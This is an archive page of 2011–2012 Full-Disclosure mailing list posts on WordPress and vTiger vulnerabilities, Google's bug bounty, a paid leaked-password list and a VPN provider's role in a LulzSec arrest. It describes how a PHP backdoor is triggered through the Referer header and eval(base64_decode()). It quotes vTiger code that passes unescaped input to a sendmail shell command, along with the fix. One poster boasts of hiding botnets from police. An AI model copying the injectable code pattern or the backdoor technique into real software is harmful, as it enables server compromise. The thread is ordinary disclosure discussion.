>>> >> It certainly took a little bit of study to trigger, but in essence
>>> here's
>>> >> what it do:
>>> >> 1. Parse the HTTP Referer string into variable: $a ("Referer:" is not
>>> >> included.)
>>> >> 2. If the first array value (not key / arg), is a string named: iz
>>> >> 3. And if there's 9 (different) arrays, then
>>> >> 4. Print out the contents of..
>>> >>
>>> >>
>>> >> This requires a bit more in-depth explanation:
>>> >> A) Evaluate the following as PHP code:
>>> >> B) Base64_decode the in

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-25 Thread Benji 
Yes it does.

wp-admin/setup-config.php?step=1 on any wp install where it exists gives
this:

The file 'wp-config.php' already exists one level above your WordPress
installation. If you need to reset any of the configuration items in this
file, please delete it first.


On Wed, Jan 25, 2012 at 4:11 PM, Julius Kivimäki
wrote:

> Funny but no, this does not need a non-installed wordpress.
>
>
> 2012/1/25 Benji 
>
>> Dear full-disclosure
>>
>> I wrote to you to tell you about serious serious vulnerability in all
>> Windows versions.
>>
>> If you turn machine on before system is configured, then you be able to
>> set user password yourself, big gaping hole
>>
>> I make big large botnet to fully utilise this impressive vulnerability!
>> thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i
>> say nay though! Big time russian mobster offer me diamond, i say nay! I
>> like report vuln of this size responsibility in so hope to make more
>> money^H^H^H^H^H^H^Hsecure world.
>>
>> Please full-disclosure, this vuln is serious and i plead you shut down
>> all windows now.
>>
>> I wrote metasploit module! It find new installs turned off machine, WOL
>> and i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many
>> wifes!
>>
>>
>>
>>
>> On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown  wrote:
>>
>>> On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote:
>>>
>>> > There is A LOT of these open installation pages in the Internet. It is
>>> not
>>> > uncommon to leave those open by accident. Some people also do this,
>>> > because they just don't understand the risks. I am wondering if
>>> WordPress
>>> > would apply patch if we create one as a collaborative effort. I would
>>> be
>>> > more than happy to help creating a patch for this if this is the case.
>>>
>>> I may have missed something, but does simply having the file exposed
>>> make you
>>> vulnerable.  From looking at it, it starts of with a bunch of
>>> file_exists(),
>>> which essentially evaluate if you've installed or not and wp_die() if you
>>> have.
>>>
>>> Tim
>>> --
>>> Tim Brown
>>> <mailto:t...@65535.com>
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-25 Thread Benji 
Dear full-disclosure

I wrote to you to tell you about serious serious vulnerability in all
Windows versions.

If you turn machine on before system is configured, then you be able to set
user password yourself, big gaping hole

I make big large botnet to fully utilise this impressive vulnerability!
thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i
say nay though! Big time russian mobster offer me diamond, i say nay! I
like report vuln of this size responsibility in so hope to make more
money^H^H^H^H^H^H^Hsecure world.

Please full-disclosure, this vuln is serious and i plead you shut down all
windows now.

I wrote metasploit module! It find new installs turned off machine, WOL and
i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many
wifes!




On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown  wrote:

> On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote:
>
> > There is A LOT of these open installation pages in the Internet. It is
> not
> > uncommon to leave those open by accident. Some people also do this,
> > because they just don't understand the risks. I am wondering if WordPress
> > would apply patch if we create one as a collaborative effort. I would be
> > more than happy to help creating a patch for this if this is the case.
>
> I may have missed something, but does simply having the file exposed make
> you
> vulnerable.  From looking at it, it starts of with a bunch of
> file_exists(),
> which essentially evaluate if you've installed or not and wp_die() if you
> have.
>
> Tim
> --
> Tim Brown
> 
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google open redirect

2011-12-08 Thread Benji 
>>IMHO, 500$ is an incredibly minute amount to give even for a error
>>message information disclosure/an open redirect,
>>researchers with bills can't make a living like that.. although it
>>might? be okay for students.

I wasn't being "strange", you pretty much implied it.

On Thu, Dec 8, 2011 at 3:03 PM, Charles Morris  wrote:

> Don't be strange, was I not specific enough?
>
> I think people should be encouraged to do the work,
> if they are good enough to find something that nobody else has noticed yet-
> and all of these "cash for bugs" programs have me a bit annoyed.
>
> Not offering the money for issues that they claim to offer for issues
> is not only dishonest but it is discouraging to beginning researchers.
>
> I've personally seen it happen.
>
> On Thu, Dec 8, 2011 at 9:57 AM, Benji  wrote:
> > Sorry, you think people should be making a living off reporting open
> > redirect disclosure?
> >
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google open redirect

2011-12-08 Thread Benji 
Sorry, you think people should be making a living off reporting open
redirect disclosure?

On Thu, Dec 8, 2011 at 2:53 PM, Charles Morris  wrote:

> Michal/Google,
>
> IMHO, 500$ is an incredibly minute amount to give even for a error
> message information disclosure/an open redirect,
> researchers with bills can't make a living like that.. although it
> might? be okay for students.
>
> How many Google vulnerabilities per month are there expected to be?
> Granted there are other avenues to pursue for a fledgling researcher,
>
> What is the cost to Google's business if an open redirect causes their
> image to be tarnished
> by some arbitrary amount in the eyes of some percentage of consumers?
>
> Considering Google grossed 30 billion dollars in 2010, (ridiculous) I
> would expect that the numbers
> we are talking about perhaps are so massive that 500$ is nothing in
> comparison.
>
> We live in an age that pays 5k, or 30k, or 100k for a root level
> compromise,
> in a common package with a reliable and solid exploit. At least that's
> what I hear.
>
> Even if everyone else's opinion says "500$ is too much for a redirect",
> doesn't Google want to promote the industry by sharing a little of the
> wealth to people with good intentions and ability?
>
> It's time to raise the bar a little here, and I'm not just talking about
> bounty.
>
> Why would Google ever suffer from these issues to begin with?
> Can't Google, in it's infinite wisdom and 30 billion dollars, come up with
> a better solution for whatever random problem they are trying to solve
> with an open redirect?
>
>
> n.b. I have never sold a vulnerability, even when non-pittance sums are
> offered
>
> /rant
>
> On Thu, Dec 8, 2011 at 12:15 AM, Michal Zalewski 
> wrote:
> >> _Open_ URL redirectors are trivially prevented by any vaguely sentient
> >> web developer as URL redirectors have NO legitimate use from outside
> >> one's own site so should ALWAYS be implemented with Referer checking
> >
> > There are decent solutions to lock down some classes of open
> > redirectors (and replace others with direct linking), but "Referer"
> > checking isn't one of them. It has several subtle problems that render
> > it largely useless in real-world apps.
> >
> ...
> > We have a vulnerability reward program, and it's just about not paying
> > $500 for reports of that vulnerability - along with not paying for
> > many other minimal-risk problems such as path disclosure.
> >
> > /mz
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Large password list

2011-12-01 Thread Benji 
Which country is "UNIQPASS" registered as a tm?


On Fri, Dec 2, 2011 at 1:47 AM, adam  wrote:

> >>- reduce abuse
>
> The concerning part is that you're serious. Tell me, how does someone
> paying for a list of STOLEN passwords reduce abuse?
>
> This email, your obsession with LulzSec and the disclaimer on your site
> make it pretty clear where the information is coming from, so what kind of
> abuse potential does this have by someone not paying? And who are you to
> not only take credit, but also demand payment, for other peoples' efforts?
>
> I'm partly tempted to buy and post the list here just to spite you for
> being so idiotic.
>
> On Thu, Dec 1, 2011 at 7:16 PM, Addy Yeow  wrote:
>
>> There are many password lists already available for free out in the wild
>> but mostly lack the quality.
>>
>> The minimal fee for UNIQPASS is necessary to help:
>> - keep ongoing effort to improve the quality of the list over time
>> - ensure frequent updates, i.e. when new leaked databases appear
>> (existing users of UNIQPASS get updated copy for free)
>> - cover cost of upstream bandwidth, the list is currently at  64MB
>> compressed and new versions are likely to only get larger
>> - reduce abuse
>>
>> On Fri, Dec 2, 2011 at 1:33 AM, Fabio Pietrosanti (naif) <
>> li...@infosecurity.ch> wrote:
>>
>>> On 12/1/11 6:14 PM, Addy Yeow wrote:
>>> > I thought some of you may find this large password list useful, over 27
>>> > million entries.
>>> > http://dazzlepod.com/uniqpass/ (it's a paid list though, at $4.99)
>>>
>>> Anyone linking a warez version (Why pay $4.99?) ?
>>>
>>> -naif
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default

2011-11-21 Thread Benji 
Oh thank god, this thread has now become a case of 'look how big my penis
will be in x amount of months'.

On Mon, Nov 21, 2011 at 12:24 PM, Darren Martyn <
d.martyn.fulldisclos...@gmail.com> wrote:

> Jason has a good point. Now to make a simple statement - I am not (nor was
> I) agreeing with the Ubuntu bashing in this, merely stating a point that it
> puts user friendliness over security AT TIMES. I only switched distro for I
> had... Disagreements... with Ubuntu's Wireless stack in installations more
> recent than 10.04LTS.
>
> I still run 10.04 "Netbook Remix" on the occasion that I have access to a
> netbook (I no longer own even a desktop) and like it, it does the bloody
> job, is easy to install rapidly, and does not require much fucking about
> with. Sure, the purists may demand one compiles kernel from source, reads
> parts (or all) of the src to look for POSSIBLE bugs, etc, and "builds their
> own Linux", but I find that 8/10 times that is impractical, an unnecessary
> complication, or merely too time consuming.
>
> Just as an aside, my goal once I aquire my own computer (or rather, a
> replacement for the boxes I no longer have) is to do the following:
> 1) Read the latest kernels source over a long period of time, looking for
> bugs and to get a better understanding of how it works on that level
> 2) Build my own distro
> 3) Write my own network manager based off the LORCON/MadWiFi drivers
> (using PyLORCON bindings) for the GNOME interface to replace the
> not-reliable "network manager" applet.
>
> Is there anyone else on the list with similar aspirations to understand
> the underlying OS on that level or is everyone content with simply bitching
> about distros?
>
> On Mon, Nov 21, 2011 at 10:27 AM, Jason A. Donenfeld wrote:
>
>> Hello Full Disclosure Hysterics & Friends,
>>
>> I have now read through five dozen complaints about how Ubuntu
>> is fundamentally an "unsecure" operating system, filled with more holes
>> than Swiss cheese.
>>
>> If somebody could direct me toward a local root exploit against a fully
>> up-to-date Ubuntu 11.04 or 11.10 that attacks a piece of software that is
>> installed by default, I would be most impressed and persuaded by your
>> assertions, as well as being very appreciative.
>>
>> Thank you,
>> Management
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
> --
> My Homepage :D 
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] vTiger CRM 5.2.x <= Remote Code Execution Vulnerability

2011-10-06 Thread Benji 
and where in vTiger is this manipulatable from?

On Wed, Oct 5, 2011 at 11:02 AM, YGN Ethical Hacker Group wrote:

> vTiger CRM 5.2.x <= Remote Code Execution Vulnerability
>
>
> 1. OVERVIEW
>
> The vTiger CRM 5.2.1 and lower versions are vulnerable to Remote Code
> Execution. No fixed version has been released as of 2011-10-05.
>
>
> 2. BACKGROUND
>
> vtiger CRM is a free, full-featured, 100% Open Source CRM software
> ideal for small and medium businesses, with low-cost product support
> available to production users that need reliable support. vtiger CRM
> is a widely used product with thousands of users in dozens of
> countries.  It has a vibrant community of users driving the product
> forward, and contributing to it's development.  Over 2 million copies
> of vtiger CRM have been downloaded so far. It was launched as a fork
> of version 1.0 of the SugarCRM project launched on December 31st,
> 2004.
>
>
> 3. VULNERABILITY DESCRIPTION
>
> vTiger uses the vulnerable version of phpmailer class file located at
> /cron/class.phpmailer.php .
>
>
> 4. VERSIONS AFFECTED
>
> Tested on 5.2.1
>
>
> 5. PROOF-OF-CONCEPT/EXPLOIT
>
> File: /cron/class.phpmailer.php
> [code]
>
> 391:function SendmailSend($header, $body) {
> 392:if ($this->Sender != "")
> 393:   $sendmail = sprintf("%s -oi -f %s -t", $this->Sendmail,
> $this->Sender);
> 394:else
> 395:   $sendmail = sprintf("%s -oi -t", $this->Sendmail);
>
> [/code]
>
>
> 6. SOLUTION
>
> The vendor hasn't attempted to incorporate the latest version of
> phpMailer class in their vTigerCRM as of version 5.2.1.
>
> The flawed code portion can be patched with:
>
> 393: $sendmail = sprintf("%s -oi -f %s -t",
> escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender));
> 395: $sendmail = sprintf("%s -oi -t", escapeshellcmd($this->Sendmail));
>
>
> 7. VENDOR
>
> vTiger Development Team
> http://www.vtiger.com/
>
>
> 8. CREDIT
>
> This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
> Ethical Hacker Group, Myanmar.
>
>
> 9. DISCLOSURE TIME-LINE
>
> 2010-12-08: notified vendor
> 2011-10-05: no fixed version released yet
> 2011-10-05: vulnerability disclosed
>
>
> 10. REFERENCES
>
> Original Advisory URL:
> http://yehg.net/lab/pr0js/advisories/%5BvTiger_5.2.1%5D_rce
> Wiki VtigerCRM: https://secure.wikimedia.org/wikipedia/en/wiki/Vtiger_CRM
> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3215
>
> #yehg [2011-10-05]
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member

2011-09-29 Thread Benji 
No, you are wrong.

Either; the vpn provider complied with court order, or they face the legal
ramifications of not doing so. User location is irrelevant.

On Thu, Sep 29, 2011 at 2:04 PM, xD 0x41  wrote:

> indeed :)
> but, it is how a proper anon person would operate, well, tht is how i once
> did...
> anyhow, it is to broad, and, yes, i qwould never believe in bulletproof,
> unless i have used it maybe, for 10yrs, thru 10 botnets ;P wich, is very
> rare but funnily, possible.
> webhosters, are even more corrupt and better at hiding data.. face it, if
> the vpn provider had not shat themself, then it would be a non story.
>
>
>
>
> On 29 September 2011 23:00, Benji  wrote:
>
>> 'Abuse' emails and court orders are very different.
>>
>> On Thu, Sep 29, 2011 at 1:59 PM, xD 0x41  wrote:
>>
>>> err, you are limited in those countries dude... id really checkup on that
>>> ... maybe some but, yea i agree, i dont think any hosting is anon, but, i
>>> sure know i have kept an anon dedis in past, and was VERY easy to avoid
>>> handing anything over. Unless they had personally seized from my company, i
>>> was allowed to basically get away with, and if i want to, again, could do
>>> the same  'anonymously' and, indeed keep those details, away.
>>> it is not frigin hard dude, where did Yyou get the idea, that is not hard
>>> to move a user around boxes :P
>>>  and rename them, etc etc etc, always change ipv6 tunnels... there is
>>> somany ways, you obv have not ran a dedicated server in a company
>>> environment coz boi, they hide nets on legit hostin now, legit apparently*
>>> companies...and they do it using those simple means, and, even show logs of
>>> them 'removing and deleting' files of the apprent 'bad user' , this is, a
>>> whole different level than even needing to deal with cops.. so, you are
>>> scared too much by laws  wich can be smokescreened.
>>> Run a dedis, or simply ask a admin, howmany abuse they get, and howmany
>>> users they actually rm ;)
>>> you would want this service, on your vps ?
>>> i surely wouldnt,. i know, with me, if i offer anon, you stay damn anon,
>>> if you bring cops to MY HOUSE, then i may have to try and, simply keep my
>>> darn data secure ey ?
>>> how about that ?
>>> simple methods, defeat simple plans benji.
>>> xd
>>>
>>>
>>>
>>> On 29 September 2011 22:53, Benji  wrote:
>>>
>>>> Yes they do. If you buy a server in America for example, even if you are
>>>> located in Russia, they are required by federal law to hand over your
>>>> details wherever you may reside. I dont know where you've obtained this 
>>>> idea
>>>> that they can't.
>>>>
>>>> Just because something is advertised as 'anonymous' doesnt mean it's 'so
>>>> anonymous you can break the law' and anyone using a EU/US-related country 
>>>> to
>>>> do this is either stupid or naive.
>>>>
>>>> On Thu, Sep 29, 2011 at 1:50 PM, xD 0x41  wrote:
>>>>
>>>>> They advertised as anonymous VPN to 'everyone'.
>>>>> Then, that would mean, especially NOT locally, thats something wich is
>>>>> also, subject to federal laws though so, in its own country, the provider
>>>>> may have to, nomatter whats advertised, BUT outside of country customers,
>>>>> should not be handed over.
>>>>> isp's here dont do it, and havent, for like 20 yrs, they also do not
>>>>> take down people,issue nor execute other peoples 'takedown orders', there 
>>>>> is
>>>>> many reasons for this but basically, they loose money from it.
>>>>> Anyhow, in UK, you maybe right, but outside of there, then, they should
>>>>> have maybe not advertised as anononymous vpn services for everyone and
>>>>> anyone. thats obvious crap we know now.
>>>>> anyhow, cheers,
>>>>> xd
>>>>>
>>>>>
>>>>>
>>>>> On 29 September 2011 22:45, Benji  wrote:
>>>>>
>>>>>> Im sorry, why is it 'worrying' that a vpn provider that was a UK
>>>>>> business and was located in the UK, is subject to UK law?
>>>>>>
>>>>>>
>>>>>>
>>>>>> On Thu, Sep 29, 2011 at 9:51 AM, Darren Martyn <
>>>>>> d.martyn.fulldi

Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member

2011-09-29 Thread Benji 
And in that case, if you're trusting someone else to keep you anonymous,
again, you are stupid and naive.

Honestly, by now you would think people would know: do everything yourself,
trust no-one.

On Thu, Sep 29, 2011 at 2:04 PM,  wrote:

> On Thu, 29 Sep 2011 13:53:03 BST, Benji said:
>
> > Just because something is advertised as 'anonymous' doesnt mean it's 'so
> > anonymous you can break the law' and anyone using a EU/US-related country
> to
> > do this is either stupid or naive.
>
> There's also those servers that advertise "anonymous and likely to stay
> that
> way because we've bought a few corrupt government officials".  But if
> you're
> buying services from them, you''re neither stupid nor naive, and know
> *exactly*
> why you're doing business with them
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member

2011-09-29 Thread Benji 
'Abuse' emails and court orders are very different.

On Thu, Sep 29, 2011 at 1:59 PM, xD 0x41  wrote:

> err, you are limited in those countries dude... id really checkup on that
> ... maybe some but, yea i agree, i dont think any hosting is anon, but, i
> sure know i have kept an anon dedis in past, and was VERY easy to avoid
> handing anything over. Unless they had personally seized from my company, i
> was allowed to basically get away with, and if i want to, again, could do
> the same  'anonymously' and, indeed keep those details, away.
> it is not frigin hard dude, where did Yyou get the idea, that is not hard
> to move a user around boxes :P
>  and rename them, etc etc etc, always change ipv6 tunnels... there is
> somany ways, you obv have not ran a dedicated server in a company
> environment coz boi, they hide nets on legit hostin now, legit apparently*
> companies...and they do it using those simple means, and, even show logs of
> them 'removing and deleting' files of the apprent 'bad user' , this is, a
> whole different level than even needing to deal with cops.. so, you are
> scared too much by laws  wich can be smokescreened.
> Run a dedis, or simply ask a admin, howmany abuse they get, and howmany
> users they actually rm ;)
> you would want this service, on your vps ?
> i surely wouldnt,. i know, with me, if i offer anon, you stay damn anon, if
> you bring cops to MY HOUSE, then i may have to try and, simply keep my darn
> data secure ey ?
> how about that ?
> simple methods, defeat simple plans benji.
> xd
>
>
>
> On 29 September 2011 22:53, Benji  wrote:
>
>> Yes they do. If you buy a server in America for example, even if you are
>> located in Russia, they are required by federal law to hand over your
>> details wherever you may reside. I dont know where you've obtained this idea
>> that they can't.
>>
>> Just because something is advertised as 'anonymous' doesnt mean it's 'so
>> anonymous you can break the law' and anyone using a EU/US-related country to
>> do this is either stupid or naive.
>>
>> On Thu, Sep 29, 2011 at 1:50 PM, xD 0x41  wrote:
>>
>>> They advertised as anonymous VPN to 'everyone'.
>>> Then, that would mean, especially NOT locally, thats something wich is
>>> also, subject to federal laws though so, in its own country, the provider
>>> may have to, nomatter whats advertised, BUT outside of country customers,
>>> should not be handed over.
>>> isp's here dont do it, and havent, for like 20 yrs, they also do not take
>>> down people,issue nor execute other peoples 'takedown orders', there is many
>>> reasons for this but basically, they loose money from it.
>>> Anyhow, in UK, you maybe right, but outside of there, then, they should
>>> have maybe not advertised as anononymous vpn services for everyone and
>>> anyone. thats obvious crap we know now.
>>> anyhow, cheers,
>>> xd
>>>
>>>
>>>
>>> On 29 September 2011 22:45, Benji  wrote:
>>>
>>>> Im sorry, why is it 'worrying' that a vpn provider that was a UK
>>>> business and was located in the UK, is subject to UK law?
>>>>
>>>>
>>>>
>>>> On Thu, Sep 29, 2011 at 9:51 AM, Darren Martyn <
>>>> d.martyn.fulldisclos...@gmail.com> wrote:
>>>>
>>>>> Again, I hope this does not fail to send.
>>>>> The reasoning behind the "Pure Elite" recruitment channel was A: to
>>>>> recruit some talented people (and, by all accounts, there were some 
>>>>> talented
>>>>> programmers there) and B: development and idle talk. Now more interesting
>>>>> was the reasoning behind the name - by putting the developers and coders 
>>>>> and
>>>>> potential recruits in a channel named "Pure Elite", it was essentially an
>>>>> ego boost for the new guys, made them feel valued, etc, when in fact most
>>>>> were but pawns to be used (IMHO).
>>>>>
>>>>> This co-operation between VPN providers and LEO, while being nothing
>>>>> new - remember how hushmail caved in - is indeed worrying for those of us
>>>>> who are privacy advocates as well as security researchers.
>>>>>
>>>>> On a more direct note, Laurelei, do not presume that you know all there
>>>>> is to know about them. Doing so would be foolish. (Now don't go assuming
>>>>> that I hate you, I

Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member

2011-09-29 Thread Benji 
Yes they do. If you buy a server in America for example, even if you are
located in Russia, they are required by federal law to hand over your
details wherever you may reside. I dont know where you've obtained this idea
that they can't.

Just because something is advertised as 'anonymous' doesnt mean it's 'so
anonymous you can break the law' and anyone using a EU/US-related country to
do this is either stupid or naive.

On Thu, Sep 29, 2011 at 1:50 PM, xD 0x41  wrote:

> They advertised as anonymous VPN to 'everyone'.
> Then, that would mean, especially NOT locally, thats something wich is
> also, subject to federal laws though so, in its own country, the provider
> may have to, nomatter whats advertised, BUT outside of country customers,
> should not be handed over.
> isp's here dont do it, and havent, for like 20 yrs, they also do not take
> down people,issue nor execute other peoples 'takedown orders', there is many
> reasons for this but basically, they loose money from it.
> Anyhow, in UK, you maybe right, but outside of there, then, they should
> have maybe not advertised as anononymous vpn services for everyone and
> anyone. thats obvious crap we know now.
> anyhow, cheers,
> xd
>
>
>
> On 29 September 2011 22:45, Benji  wrote:
>
>> Im sorry, why is it 'worrying' that a vpn provider that was a UK business
>> and was located in the UK, is subject to UK law?
>>
>>
>>
>> On Thu, Sep 29, 2011 at 9:51 AM, Darren Martyn <
>> d.martyn.fulldisclos...@gmail.com> wrote:
>>
>>> Again, I hope this does not fail to send.
>>> The reasoning behind the "Pure Elite" recruitment channel was A: to
>>> recruit some talented people (and, by all accounts, there were some talented
>>> programmers there) and B: development and idle talk. Now more interesting
>>> was the reasoning behind the name - by putting the developers and coders and
>>> potential recruits in a channel named "Pure Elite", it was essentially an
>>> ego boost for the new guys, made them feel valued, etc, when in fact most
>>> were but pawns to be used (IMHO).
>>>
>>> This co-operation between VPN providers and LEO, while being nothing new
>>> - remember how hushmail caved in - is indeed worrying for those of us who
>>> are privacy advocates as well as security researchers.
>>>
>>> On a more direct note, Laurelei, do not presume that you know all there
>>> is to know about them. Doing so would be foolish. (Now don't go assuming
>>> that I hate you, I bear you bugger all ill-will, etc).
>>> Good day.
>>>
>>>
>>> On Wed, Sep 28, 2011 at 5:44 AM, Laurelai Storm 
>>> wrote:
>>>
>>>> Its all good dude. What really concerns me is that vpn providers might
>>>> give over logs to oppressive regemes. TOR is starting to look better and
>>>> better.
>>>> On Sep 27, 2011 11:40 PM, "GloW - XD"  wrote:
>>>> > never did... was only for one buttcheek kid that i was alittle pissed
>>>> and
>>>> > thinking things wich, prolly were wrong at the time...
>>>> > I am adult enough to apologise for what happened back then, and
>>>> hopefully it
>>>> > is just, cool.
>>>> > :)
>>>> > cheers, your loved by many, you just have many trollers to :sp
>>>> > take care ,
>>>> > xd
>>>> >
>>>> >
>>>> > On 28 September 2011 14:32, Laurelai Storm 
>>>> wrote:
>>>> >
>>>> >> Im suprised, someone on the internet who *doesn't * hate me :p
>>>> >> On Sep 27, 2011 11:29 PM, "GloW - XD"  wrote:
>>>> >> > Hello Laurelai ,
>>>> >> > Oh i agree it is still a terrible precedent to be set.. I dont even
>>>> know
>>>> >> > where, legally, i stand anymore...
>>>> >> > It is rather disturbing, nomatter WHO it was laurela.
>>>> >> > I am all for the hatred against the VPN provs, and this is not just
>>>> >> > happening here, and i made a BIG statement about this, and privacy,
>>>> in my
>>>> >> > channel on efnet, first as i saw it.
>>>> >> >
>>>> >> > Then saw a torrentfreak feed,of someone who was an owner of a huge
>>>> >> torrent
>>>> >> > site, was handed to authorities, not by the hoster, no... but by
>>>> the
>>>>

  1   2   3   >